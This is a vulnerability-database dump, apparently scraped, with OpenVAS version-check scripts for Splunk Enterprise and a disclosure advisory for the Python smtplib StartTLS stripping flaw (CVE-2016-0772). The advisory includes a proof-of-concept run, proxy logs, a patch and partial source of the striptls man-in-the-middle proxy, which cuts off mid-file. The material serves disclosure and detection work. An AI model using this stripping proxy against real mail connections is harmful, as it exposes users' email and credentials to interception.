version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:splunk:splunk';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106539\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-24 10:40:31 +0700 (Tue, 24 Jan 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2016-5636\", \"CVE-2016-5699\", \"CVE-2016-0772\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Splunk Enterprise Python Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_splunk_detect.nasl\");\n script_mandatory_keys(\"Splunk/installed\");\n\n script_tag(name:\"summary\", value:\"Splunk Enterprise is prone to multiple vulnerabilities in Python.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Splunk Enterprise is prone to multiple vulnerabilities in Python:\n\n - Integer overflow in the get_data function in zipimport.c in Python allows remote attackers to have unspecified\nimpact via a negative data size value, which triggers a heap-based buffer overflow. (CVE-2016-5636)\n\n - CRLF injection vulnerability in the HTTPConnection.putheader function in urllib2 and urllib in Python allows\nremote attackers to inject arbitrary HTTP headers via CRLF sequences in a URL. (CVE-2016-5699)\n\n - The smtplib library in Python does not return an error when StartTLS fails, which might allow man-in-the-middle\nattackers to bypass the TLS protections by leveraging a network position between the client and the registry to\nblock the StartTLS command, aka a 'StartTLS stripping attack'. (CVE-2016-0772)\");\n\n script_tag(name:\"affected\", value:\"Splunk Enterprise 5.0.x, 6.0.x, 6.1.x, 6.2.x, 6.3.x, 6.4.x and 6.5.0\");\n\n script_tag(name:\"solution\", value:\"Update to version 5.0.17, 6.0.13, 6.1.12, 6.2.12, 6.3.8, 6.4.5, 6.5.1 or\nlater.\");\n\n script_xref(name:\"URL\", value:\"https://www.splunk.com/view/SP-CAAAPSR\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version =~ \"^5\\.0\") {\n if (version_is_less(version: version, test_version: \"5.0.17\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.0.17\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^6\\.0\") {\n if (version_is_less(version: version, test_version: \"6.0.13\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.0.13\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^6\\.1\") {\n if (version_is_less(version: version, test_version: \"6.1.12\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.1.12\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^6\\.2\") {\n if (version_is_less(version: version, test_version: \"6.2.12\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.2.12\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^6\\.3\") {\n if (version_is_less(version: version, test_version: \"6.3.8\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.3.8\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^6\\.4\") {\n if (version_is_less(version: version, test_version: \"6.4.5\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.4.5\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^6\\.5\") {\n if (version_is_less(version: version, test_version: \"6.5.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.5.1\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-16T12:55:40", "bulletinFamily": "scanner", "description": "Splunk Enterprise is prone to multiple vulnerabilities.", "modified": "2018-11-15T00:00:00", "published": "2016-11-18T00:00:00", "id": "OPENVAS:1361412562310106399", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106399", "title": "Splunk Enterprise Multiple Vulnerabilities (Nov 2016)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_splunk_enterprise_mult_vuln1.nasl 12363 2018-11-15 09:51:15Z asteins $\n#\n# Splunk Enterprise Multiple Vulnerabilities (Nov 2016)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:splunk:splunk';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106399\");\n script_version(\"$Revision: 12363 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-15 10:51:15 +0100 (Thu, 15 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-18 13:29:17 +0700 (Fri, 18 Nov 2016)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2016-5636\", \"CVE-2016-5699\", \"CVE-2016-0772\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Splunk Enterprise Multiple Vulnerabilities (Nov 2016)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_splunk_detect.nasl\");\n script_mandatory_keys(\"Splunk/installed\");\n\n script_tag(name:\"summary\", value:\"Splunk Enterprise is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Splunk Enterprise is affected by multiple vulnerabilities:\n\n - Multiple Vulnerabilities in Python (CVE-2016-5636, CVE-2016-5699, CVE-2016-0772)\n\n - HTTP Request Injection in Splunk Web: Splunk Enterprise versions is affected by an HTTP request injection\nvulnerability that permits leakage of authentication tokens. The authorization tokens permit an attacker to use\nthe Splunk REST API with the same rights as the user.\");\n\n script_tag(name:\"impact\", value:\"An attacker may obtain an authentication token which might give complete\naccess depending on the attacked user.\");\n\n script_tag(name:\"affected\", value:\"Splunk Enterprise 6.4.x, 6.3.x, 6.2.x, 6.1.x, 6.0.x and 5.0.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 6.4.4, 6.3.8, 6.2.12, 6.1.12, 6.0.13, 5.0.17 or later.\");\n\n script_xref(name:\"URL\", value:\"http://www.splunk.com/view/SP-CAAAPSR\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version =~ \"^6\\.4\") {\n if (version_is_less(version: version, test_version: \"6.4.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.4.4\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^6\\.3\") {\n if (version_is_less(version: version, test_version: \"6.3.8\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.3.8\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\n\nif (version =~ \"^6\\.2\") {\n if (version_is_less(version: version, test_version: \"6.2.12\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.2.12\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^6\\.1\") {\n if (version_is_less(version: version, test_version: \"6.1.12\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.1.12\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^6\\.0\") {\n if (version_is_less(version: version, test_version: \"6.0.13\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.0.13\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version_is_less(version: version, test_version: \"5.0.17\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.0.17\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-05T23:44:36", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category local exploits", "modified": "2018-01-11T00:00:00", "published": "2018-01-11T00:00:00", "href": "https://0day.today/exploit/description/29438", "id": "1337DAY-ID-29438", "type": "zdt", "title": "Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping Vulnerability", "sourceData": "VuNote\r\n============\r\n \r\n Author: <github.com/tintinweb>\r\n Version: 0.2\r\n Date: Nov 25th, 2015\r\n \r\n Tag: python smtplib starttls stripping (mitm)\r\n \r\nOverview\r\n--------\r\n \r\n Name: python \r\n Vendor: python software foundation\r\n References: * https://www.python.org/ [1]\r\n \r\n Version: 2.7.11, 3.4.4, 3.5.1\r\n Latest Version: 2.7.11, 3.4.4, 3.5.1 [2]\r\n Other Versions: 2.2 [3] (~14 years ago) <= affected <= 2.7.11\r\n 3.0 [3] (~7 years ago) <= affected <= 3.4.4\r\n 3.5.1\r\n Platform(s): cross\r\n Technology: c/python\r\n \r\n Vuln Classes: Selection of Less-Secure Algorithm During Negotiation (CWE-757)\r\n Origin: remote/mitm\r\n Min. Privs.: -\r\n \r\n CVE: CVE-2016-0772\r\n \r\n \r\nDescription\r\n---------\r\n \r\nquote wikipedia [4]\r\n \r\n>Python is a widely used high-level, general-purpose, interpreted, dynamic programming language. Its design philosophy emphasizes code readability, and its syntax allows programmers to express concepts in fewer lines of code than would be possible in languages such as C++ or Java.[24][25] The language provides constructs intended to enable clear programs on both a small and large scale.\r\n \r\n \r\nSummary \r\n-------\r\n \r\npython smtplib does not seem to raise an exception when the remote \r\nend (smtp server) is capable of negotiating starttls (as seen in the \r\nresponse to ehlo) but fails to respond with 220 (ok) to an explicit \r\ncall of `SMTP.starttls()`. This may allow a malicious mitm to perform a \r\nstarttls stripping attack if the client code does not explicitly check \r\nthe response code for starttls, which is rarely done as one might \r\nexpect that it raises an exception when starttls negotiation fails \r\n(like when calling starttls on a server that does not support it or \r\nwhen it fails to negotiate tls due to an ssl exception/cipher \r\nmismatch/auth fail).\r\n \r\nQuoting the PSRT with an extended analysis\r\n \r\n> It is a surprising and potential dangerous behavior. It also violates Python's documentation. states that all SMTP commands after starttls() are encrypted. That's clearly not true in case of response != 200. I also had a look how the other stdlib libraries handle starttls problems. nntplib's and imaplib's starttls() method raise an error when the starttls handshake fails.\r\n \r\nChecking on how `smtplib.starttls()` is actually being used by open-source projects underlines that `smtplib.starttls()` is generally expected to throw an exception if the starttls protocol was not executed correctly. Therefore this issue may have an impact on some major projects like Django, web2py. Apart from that the current `smtplib.starttls()` behavior is different to `nntplib.starttls()`, `imaplib.starttls()`\r\n \r\nPoC see [6]\r\npatch attached.\r\n \r\nDetails\r\n------\r\n \r\nThe vulnerable code is located in `lib/smtplib.py` [3] line 646 (2.7 branch) and \r\nfails to raise an exception if `resp!=220`.\r\n \r\nThe documentation [7] suggests that `starttls()` either encrypts all communication\r\nor throws an exception if it was not able to negotiate tls.\r\n \r\n SMTP.starttls([keyfile[, certfile]])\r\n Put the SMTP connection in TLS (Transport Layer Security) mode. All SMTP commands that follow will be encrypted. You should then call ehlo() again.\r\n \r\n If keyfile and certfile are provided, these are passed to the socket module\ufffds ssl() function.\r\n \r\n If there has been no previous EHLO or HELO command this session, this method tries ESMTP EHLO first.\r\n \r\n Changed in version 2.6.\r\n \r\n SMTPHeloError\r\n The server didn\ufffdt reply properly to the HELO greeting.\r\n SMTPException\r\n The server does not support the STARTTLS extension.\r\n Changed in version 2.6.\r\n \r\n RuntimeError\r\n SSL/TLS support is not available to your Python interpreter.\r\n \r\n \r\nCode `lib/smtplib.py`:\r\n \r\nInline annotations are prefixed with `//#!`\r\n \r\n def starttls(self, keyfile=None, certfile=None):\r\n \"\"\"Puts the connection to the SMTP server into TLS mode.\r\n If there has been no previous EHLO or HELO command this session, this\r\n method tries ESMTP EHLO first.\r\n If the server supports TLS, this will encrypt the rest of the SMTP\r\n session. If you provide the keyfile and certfile parameters,\r\n the identity of the SMTP server and client can be checked. This,\r\n however, depends on whether the socket module really checks the\r\n certificates.\r\n This method may raise the following exceptions:\r\n SMTPHeloError The server didn't reply properly to\r\n the helo greeting.\r\n \"\"\"\r\n self.ehlo_or_helo_if_needed()\r\n if not self.has_extn(\"starttls\"):\r\n raise SMTPException(\"STARTTLS extension not supported by server.\")\r\n (resp, reply) = self.docmd(\"STARTTLS\")\r\n if resp == 220: //#! with a server not responding 220 it wont even try to negotiate tls\r\n if not _have_ssl: //#! silently stays unencrypted\r\n raise RuntimeError(\"No SSL support included in this Python\")\r\n self.sock = ssl.wrap_socket(self.sock, keyfile, certfile)\r\n self.file = SSLFakeFile(self.sock)\r\n # RFC 3207:\r\n # The client MUST discard any knowledge obtained from\r\n # the server, such as the list of SMTP service extensions,\r\n # which was not obtained from the TLS negotiation itself.\r\n self.helo_resp = None\r\n self.ehlo_resp = None\r\n self.esmtp_features = {}\r\n self.does_esmtp = 0\r\n return (resp, reply) //#! to actually detect this a client would have to manually check resp==220\r\n //#! or that the socket was turned into an SSLSock object\r\n \r\nProof of Concept\r\n----------------\r\n \r\n1. start `striptls.py` proxy\r\n \r\n #> python striptls/striptls.py -l 0.0.0.0:9999 -r remote.mailserver.tld:25 -x SMTP.StripWithInvalidResponseCode\r\n \r\n - INFO - <Proxy 0x1f04910 listen=('0.0.0.0', 9999) target=('remote.mailserver.tld', 25)> ready.\r\n - DEBUG - * added test (port:25 , proto: SMTP): <class __main__.StripWithInvalidResponseCode at 0x020F85E0>\r\n - INFO - <RewriteDispatcher vectors={25: set([<class __main__.StripWithInvalidResponseCode at 0x020F85E0>])}>\r\n \r\n2. send mail using `smtplib` (starttls)\r\n \r\n import smtplib\r\n server = smtplib.SMTP('localhost', port=9999)\r\n server.set_debuglevel(1)\r\n server.ehlo()\r\n print server.esmtp_features\r\n server.starttls()\r\n server.sendmail(\"[email\u00a0protected]\", \"[email\u00a0protected]\", \"From: [email\u00a0protected]\\r\\nTo: [email\u00a0protected]\\r\\n\\r\\n\")\r\n server.quit()\r\n \r\n3. watch `striptls.py` fake the server response with `resp=200` instead of `resp=220`, not forwarding the message to the server. This effectively strips starttls. `smtplib` keeps sending in plaintext with no indication to the client code that starttls negotiation actually failed.\r\n \r\n - DEBUG - <ProtocolDetect 0x1f25530 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)\r\n - INFO - <Session 0x1f0ea50> client ('127.0.0.1', 59687) has connected\r\n - INFO - <Session 0x1f0ea50> connecting to target ('remote.mailserver.tld', 25)\r\n - DEBUG - <Session 0x1f0ea50> [client] <= [server] '220 mailserver.tld (msrv002) Nemesis ESMTP Service ready\\r\\n'\r\n - DEBUG - <RewriteDispatcher - changed mangle: __main__.StripWithInvalidResponseCode new: True>\r\n - DEBUG - <Session 0x1f0ea50> [client] => [server] 'ehlo [192.168.139.1]\\r\\n'\r\n - DEBUG - <Session 0x1f0ea50> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [x.x.x.x]\\r\\n250-SIZE 3 1457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\r\n - DEBUG - <Session 0x1f0ea50> [client] => [server] 'STARTTLS\\r\\n'\r\n - DEBUG - <Session 0x1f0ea50> [client] <= [server][mangled] '200 STRIPTLS\\r\\n'\r\n - DEBUG - <Session 0x1f0ea50> [client] => [server][mangled] None\r\n - DEBUG - <Session 0x1f0ea50> [client] => [server] 'mail FROM:<[email\u00a0protected]> size=10\\r\\n'\r\n - DEBUG - <Session 0x1f0ea50> [client] <= [server] '530 Authentication required\\r\\n'\r\n - DEBUG - <Session 0x1f0ea50> [client] => [server] 'rset\\r\\n'\r\n - DEBUG - <Session 0x1f0ea50> [client] <= [server] '250 OK\\r\\n'\r\n - WARNING - <Session 0x1f0ea50> terminated.\r\n \r\nPatch\r\n-------\r\n \r\n* raise an exception if the server replies with an unexpected return-code to an explicit call for `smtplib.starttls()`.\r\n \r\n #https://github.com/python/cpython <master> diff --git a/Lib/smtplib.py b/Lib/smtplib.py index 4756973..dfbf5f9 100755\r\n --- a/Lib/smtplib.py\r\n +++ b/Lib/smtplib.py\r\n @@ -773,6 +773,11 @@ class SMTP:\r\n self.ehlo_resp = None\r\n self.esmtp_features = {}\r\n self.does_esmtp = 0\r\n + else:\r\n + # RFC 3207:\r\n + # 501 Syntax error (no parameters allowed)\r\n + # 454 TLS not available due to temporary reason\r\n + raise SMTPResponseException(resp, reply)\r\n return (resp, reply)\r\n \r\n def sendmail(self, from_addr, to_addrs, msg, mail_options=[],\r\n \r\nNotes\r\n-----\r\n \r\nVendor response: see [8,9,10]\r\n \r\nTimeline:\r\n \r\n 11/25/2015 contact psrt; provided details, PoC, proposed patch\r\n 12/01/2016 response, initial analysis\r\n 01/29/2016 request ETA, bugref\r\n 02/01/2016 psrt assigned CVE-2016-0772\r\n 02/12/2016 response: will be addressed in upcoming 2.7, 3.5\r\n 02/13/2016 request ETA; response: no exact date\r\n 03/29/2016 request ETA; response: generic bounce message\r\n 05/12/2016 request ETA; no response\r\n 05/27/2016 request ETA; response: no exact date\r\n 06/12/2016 request ETA;\r\n 06/14/2016 response: ETA ~ June 26th\r\n 06/14/2016 vendor announcement [9]\r\n \r\nReferences\r\n---------\r\n \r\n [1] https://www.python.org/\r\n [2] https://www.python.org/downloads/\r\n [3] https://github.com/python/cpython/blob/2.7/Lib/smtplib.py\r\n [4] https://en.wikipedia.org/wiki/Python_(programming_language)\r\n [5] https://docs.python.org/2/library/smtplib.html#smtplib.SMTP.starttls\r\n [6] https://github.com/tintinweb/striptls\r\n [7] https://docs.python.org/2/library/smtplib.html\r\n [8] https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-0772\r\n [9] http://www.openwall.com/lists/oss-security/2016/06/14/9\r\n [10] https://access.redhat.com/security/cve/cve-2016-0772\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n#! /usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\n# Author : <github.com/tintinweb>\r\n# see: https://github.com/tintinweb/striptls\r\n# pip install striptls\r\n#\r\n'''\r\n inbound outbound\r\n[inbound_peer]<------------>[listen:proxy]<------------->[outbound_peer/target]\r\n'''\r\nimport sys\r\nimport os\r\nimport logging\r\nimport socket\r\nimport select\r\nimport ssl\r\nimport time\r\nimport re\r\n \r\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)-8s - %(message)s')\r\nlogger = logging.getLogger(__name__)\r\n \r\nclass SessionTerminatedException(Exception):pass\r\nclass ProtocolViolationException(Exception):pass\r\n \r\nclass TcpSockBuff(object):\r\n ''' Wrapped Tcp Socket with access to last sent/received data '''\r\n def __init__(self, sock, peer=None):\r\n self.socket = None\r\n self.socket_ssl = None\r\n self.recvbuf = ''\r\n self.sndbuf = ''\r\n self.peer = peer\r\n self._init(sock)\r\n \r\n def _init(self, sock):\r\n self.socket = sock\r\n \r\n def connect(self, target=None):\r\n target = target or self.peer\r\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n return self.socket.connect(target)\r\n \r\n def accept(self):\r\n return self.socket.accept()\r\n \r\n def recv(self, buflen=8*1024, *args, **kwargs):\r\n if self.socket_ssl:\r\n chunks = []\r\n chunk = True\r\n data_pending = buflen\r\n while chunk and data_pending:\r\n chunk = self.socket_ssl.read(data_pending)\r\n chunks.append(chunk)\r\n data_pending = self.socket_ssl.pending()\r\n self.recvbuf = ''.join(chunks)\r\n else:\r\n self.recvbuf = self.socket.recv(buflen, *args, **kwargs)\r\n return self.recvbuf\r\n \r\n def recv_blocked(self, buflen=8*1024, timeout=None, *args, **kwargs):\r\n force_first_loop_iteration = True\r\n end = time.time()+timeout if timeout else 0\r\n while force_first_loop_iteration or (not timeout or time.time()<end):\r\n # force one recv otherwise we might not even try to read if timeout is too narrow\r\n try:\r\n return self.recv(buflen=buflen, *args, **kwargs)\r\n except ssl.SSLWantReadError:\r\n pass\r\n force_first_loop_iteration = False\r\n \r\n def send(self, data, retransmit_delay=0.1):\r\n if self.socket_ssl:\r\n last_exception = None\r\n for _ in xrange(3):\r\n try:\r\n self.socket_ssl.write(data)\r\n last_exception = None\r\n break\r\n except ssl.SSLWantWriteError,swwe:\r\n logger.warning(\"TCPSockBuff: ssl.sock not yet ready, retransmit (%d) in %f seconds: %s\"%(_,retransmit_delay,repr(swwe)))\r\n last_exception = swwe\r\n time.sleep(retransmit_delay)\r\n if last_exception:\r\n raise last_exception\r\n else:\r\n self.socket.send(data)\r\n self.sndbuf = data\r\n \r\n def sendall(self, data):\r\n if self.socket_ssl:\r\n self.send(data)\r\n else:\r\n self.socket.sendall(data)\r\n self.sndbuf = data\r\n \r\n def ssl_wrap_socket(self, *args, **kwargs):\r\n if len(args)>=1:\r\n args[1] = self.socket\r\n if 'sock' in kwargs:\r\n kwargs['sock'] = self.socket\r\n if not args and not kwargs.get('sock'):\r\n kwargs['sock'] = self.socket\r\n self.socket_ssl = ssl.wrap_socket(*args, **kwargs)\r\n self.socket_ssl.setblocking(0) # nonblocking for select\r\n \r\n def ssl_wrap_socket_with_context(self, ctx, *args, **kwargs):\r\n if len(args)>=1:\r\n args[1] = self.socket\r\n if 'sock' in kwargs:\r\n kwargs['sock'] = self.socket\r\n if not args and not kwargs.get('sock'):\r\n kwargs['sock'] = self.socket\r\n self.socket_ssl = ctx.wrap_socket(*args, **kwargs)\r\n self.socket_ssl.setblocking(0) # nonblocking for select\r\n \r\nclass ProtocolDetect(object):\r\n PROTO_SMTP = 25\r\n PROTO_XMPP = 5222\r\n PROTO_IMAP = 143\r\n PROTO_FTP = 21\r\n PROTO_POP3 = 110\r\n PROTO_NNTP = 119\r\n PROTO_IRC = 6667\r\n PROTO_ACAP = 675\r\n PROTO_SSL = 443\r\n \r\n PORTMAP = {25: PROTO_SMTP,\r\n 5222:PROTO_XMPP,\r\n 110: PROTO_POP3,\r\n 143: PROTO_IMAP,\r\n 21: PROTO_FTP,\r\n 119: PROTO_NNTP,\r\n 6667: PROTO_IRC,\r\n 675: PROTO_ACAP\r\n }\r\n \r\n KEYWORDS = ((['ehlo', 'helo','starttls','rcpt to:','mail from:'], PROTO_SMTP),\r\n (['xmpp'], PROTO_XMPP),\r\n (['. capability'], PROTO_IMAP),\r\n (['auth tls'], PROTO_FTP)\r\n )\r\n \r\n def __init__(self, target=None):\r\n self.protocol_id = None\r\n self.history = []\r\n if target:\r\n self.protocol_id = self.PORTMAP.get(target[1])\r\n if self.protocol_id:\r\n logger.debug(\"%s - protocol detected (target port)\"%repr(self))\r\n \r\n def __str__(self):\r\n return repr(self.proto_id_to_name(self.protocol_id))\r\n \r\n def __repr__(self):\r\n return \"<ProtocolDetect %s protocol_id=%s len_history=%d>\"%(hex(id(self)), self.proto_id_to_name(self.protocol_id), len(self.history))\r\n \r\n def proto_id_to_name(self, id):\r\n if not id:\r\n return id\r\n for p in (a for a in dir(self) if a.startswith(\"PROTO_\")):\r\n if getattr(self, p)==id:\r\n return p \r\n \r\n def detect_peek_tls(self, sock):\r\n if sock.socket_ssl:\r\n raise Exception(\"SSL Detection for ssl socket ..whut!\")\r\n TLS_VERSIONS = {\r\n # SSL\r\n '\\x00\\x02':\"SSL_2_0\",\r\n '\\x03\\x00':\"SSL_3_0\",\r\n # TLS\r\n '\\x03\\x01':\"TLS_1_0\",\r\n '\\x03\\x02':\"TLS_1_1\",\r\n '\\x03\\x03':\"TLS_1_2\",\r\n '\\x03\\x04':\"TLS_1_3\",\r\n }\r\n TLS_CONTENT_TYPE_HANDSHAKE = '\\x16'\r\n SSLv2_PREAMBLE = 0x80\r\n SSLv2_CONTENT_TYPE_CLIENT_HELLO ='\\x01'\r\n \r\n peek_bytes = sock.recv(5, socket.MSG_PEEK)\r\n if not len(peek_bytes)==5:\r\n return\r\n # detect sslv2, sslv3, tls: one symbol is one byte; T .. type\r\n # L .. length \r\n # V .. version\r\n # 01234\r\n # detect sslv2 LLTVV T=0x01 ... MessageType.client_hello; L high bit set.\r\n # sslv3 TVVLL \r\n # tls TVVLL T=0x16 ... ContentType.Handshake\r\n v = None\r\n if ord(peek_bytes[0]) & SSLv2_PREAMBLE \\\r\n and peek_bytes[2]==SSLv2_CONTENT_TYPE_CLIENT_HELLO \\\r\n and peek_bytes[3:3+2] in TLS_VERSIONS.keys():\r\n v = TLS_VERSIONS.get(peek_bytes[3:3+2])\r\n logger.info(\"ProtocolDetect: SSL23/TLS version: %s\"%v)\r\n elif peek_bytes[0] == TLS_CONTENT_TYPE_HANDSHAKE \\\r\n and peek_bytes[1:1+2] in TLS_VERSIONS.keys():\r\n v = TLS_VERSIONS.get(peek_bytes[1:1+2]) \r\n logger.info(\"ProtocolDetect: TLS version: %s\"%v)\r\n return v\r\n \r\n \r\n def detect(self, data):\r\n if self.protocol_id:\r\n return self.protocol_id\r\n self.history.append(data)\r\n for keywordlist,proto in self.KEYWORDS:\r\n if any(k in data.lower() for k in keywordlist):\r\n self.protocol_id = proto\r\n logger.debug(\"%s - protocol detected (protocol messages)\"%repr(self))\r\n return\r\n \r\nclass Session(object):\r\n ''' Proxy session from client <-> proxy <-> server \r\n @param inbound: inbound socket\r\n @param outbound: outbound socket\r\n @param target: target tuple ('ip',port) \r\n @param buffer_size: socket buff size'''\r\n \r\n def __init__(self, proxy, inbound=None, outbound=None, target=None, buffer_size=4096):\r\n self.proxy = proxy\r\n self.bind = proxy.getsockname()\r\n self.inbound = TcpSockBuff(inbound)\r\n self.outbound = TcpSockBuff(outbound, peer=target)\r\n self.buffer_size = buffer_size\r\n self.protocol = ProtocolDetect(target=target)\r\n self.datastore = {}\r\n \r\n def __repr__(self):\r\n return \"<Session %s [client: %s] --> [prxy: %s] --> [target: %s]>\"%(hex(id(self)),\r\n self.inbound.peer,\r\n self.bind,\r\n self.outbound.peer)\r\n def __str__(self):\r\n return \"<Session %s>\"%hex(id(self))\r\n \r\n def connect(self, target):\r\n self.outbound.peer = target\r\n logger.info(\"%s connecting to target %s\"%(self, repr(target)))\r\n return self.outbound.connect(target)\r\n \r\n def accept(self):\r\n sock, addr = self.proxy.accept()\r\n self.inbound = TcpSockBuff(sock)\r\n self.inbound.peer = addr\r\n logger.info(\"%s client %s has connected\"%(self,repr(self.inbound.peer)))\r\n return sock,addr\r\n \r\n def get_peer_sockets(self):\r\n return [self.inbound.socket, self.outbound.socket]\r\n \r\n def notify_read(self, sock):\r\n if sock == self.proxy:\r\n self.accept()\r\n self.connect(self.outbound.peer)\r\n elif sock == self.inbound.socket:\r\n # new client -> prxy - data\r\n self.on_recv_peek(self.inbound, self)\r\n self.on_recv(self.inbound, self.outbound, self)\r\n elif sock == self.outbound.socket:\r\n # new sprxy <- target - data\r\n self.on_recv(self.outbound, self.inbound, self)\r\n return \r\n \r\n def close(self):\r\n try:\r\n self.outbound.socket.shutdown(2)\r\n self.outbound.socket.close()\r\n self.inbound.socket.shutdown(2)\r\n self.inbound.socket.close()\r\n except socket.error, se:\r\n logger.warning(\"session.close(): Exception: %s\"%repr(se))\r\n raise SessionTerminatedException()\r\n \r\n def on_recv(self, s_in, s_out, session):\r\n data = s_in.recv(session.buffer_size)\r\n self.protocol.detect(data)\r\n if not len(data):\r\n return session.close()\r\n if s_in == session.inbound:\r\n data = self.mangle_client_data(session, data)\r\n elif s_in == session.outbound:\r\n data = self.mangle_server_data(session, data)\r\n if data:\r\n s_out.sendall(data)\r\n return data\r\n \r\n def on_recv_peek(self, s_in, session): pass\r\n def mangle_client_data(self, session, data, rewrite): return data\r\n def mangle_server_data(self, session, data, rewrite): return data\r\n \r\nclass ProxyServer(object):\r\n '''Proxy Class'''\r\n \r\n def __init__(self, listen, target, buffer_size=4096, delay=0.0001):\r\n self.input_list = set([])\r\n self.sessions = {} # 